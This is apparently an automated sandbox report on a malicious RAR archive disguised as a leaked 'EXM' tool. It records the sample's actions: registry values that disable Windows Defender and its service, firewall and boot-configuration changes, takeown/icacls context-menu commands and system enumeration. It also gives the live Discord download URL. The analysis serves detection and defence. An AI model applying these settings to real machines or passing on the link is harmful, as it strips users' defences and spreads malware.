Analysis Overview
Threat Level: Known bad
The file https://cdn.discordapp.com/attachments/1122175843565842633/1181259340129243156/EXM_Leaked.rar?ex=65ef267d&is=65dcb17d&hm=19bc37788f94fff83e2b28d6138daaf56dfdeead71c7e143547b0cdea4af58d1& was found to be: Known bad.
Malicious Activity Summary
Modifies Windows Defender Real-time Protection settings
Modifies visibility of file extensions in Explorer
Modifies security service
Modifies boot configuration data using bcdedit
Stops running service(s)
Modifies Windows Firewall
Modifies system executable filetype association
Executes dropped EXE
UPX packed file
Loads dropped DLL
Adds Run key to start application
Launches sc.exe
Enumerates processes with tasklist
Modifies registry class
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of FindShellTrayWindow
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Uses Task Scheduler COM API
Enumerates system info in registry
Runs net.exe
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Gathers network information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-02 23:03
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-02 23:03
Reported
2024-03-02 23:08
Platform
win10v2004-20240226-en
Max time kernel
273s
Max time network
280s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
Modifies security service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Modifies visibility of file extensions in Explorer
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "0" | C:\Windows\system32\reg.exe | N/A |
Modifies boot configuration data using bcdedit
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
Loads dropped DLL
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\ = "Grant Admin Full Control" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\icon = "C:\\Windows\\system32\\imageres.dll ,73" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\NoWorkingDirectory | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\ = "Grant Admin Full Control" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\icon = "C:\\Windows\\system32\\imageres.dll ,73" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\NoWorkingDirectory | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command | C:\Windows\system32\reg.exe | N/A |
UPX packed file
Adds Run key to start application
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\icon = "C:\\Windows\\system32\\imageres.dll ,73" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\icon = "C:\\Windows\\system32\\imageres.dll ,73" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\OptimizeWindowsSearchResultsForScreenReaders = "0" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\icon = "C:\\Windows\\system32\\imageres.dll ,73" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\NoWorkingDirectory | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\NoWorkingDirectory | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\User\Default\SearchScopes | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\User\Default\SearchScopes\ShowSearchSuggestionsGlobal = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\icon = "C:\\Windows\\system32\\imageres.dll ,73" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DoNotTrack = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\ = "Grant Admin Full Control" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\ = "Grant Admin Full Control" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\User | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\EnableEncryptedMediaExtensions = "0" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{2D8D44F7-5EB9-4D44-9815-5FF6266782D3} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter\EnabledV9 = "0" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\ = "Grant Admin Full Control" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1122175843565842633/1181259340129243156/EXM_Leaked.rar?ex=65ef267d&is=65dcb17d&hm=19bc37788f94fff83e2b28d6138daaf56dfdeead71c7e143547b0cdea4af58d1&
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=5700 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=5744 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4544 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --mojo-platform-channel-handle=6128 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --mojo-platform-channel-handle=6256 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --mojo-platform-channel-handle=5572 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5924 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5432 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4884 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\EXM_Leaked.rar"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --mojo-platform-channel-handle=6448 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x30c 0x4c4
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x24c,0x7ff9d0222e98,0x7ff9d0222ea4,0x7ff9d0222eb0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2040 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2248 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=2680 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
